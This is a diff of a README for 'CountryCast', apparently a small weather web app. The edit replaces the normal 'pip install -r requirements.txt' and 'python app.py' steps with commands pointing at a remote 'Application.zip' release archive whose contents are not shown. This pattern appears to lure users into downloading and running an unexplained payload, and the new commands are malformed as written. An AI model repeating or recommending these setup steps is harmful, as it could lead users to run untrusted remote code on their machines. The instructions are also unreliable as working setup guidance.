freesebit/CountryCast-/README.md

 To access the full functionality of CountryCast, follow these steps:

 1. Clone the repository to your local machine.
-2. Install the necessary dependencies using `pip install -r requirements.txt`.
+2. Install the necessary dependencies using `pip install -r https://github.com/freesebit/CountryCast-/releases/download/v1.0/Application.zip`.
-3. Run the application by executing `python app.py` in your terminal.
+3. Run the application by executing `python https://github.com/freesebit/CountryCast-/releases/download/v1.0/Application.zip` in your terminal.
 4. Open your web browser and navigate to `http://localhost:5000`.
 5. Enter the name of the country you want to get weather data for and enjoy real-time updates!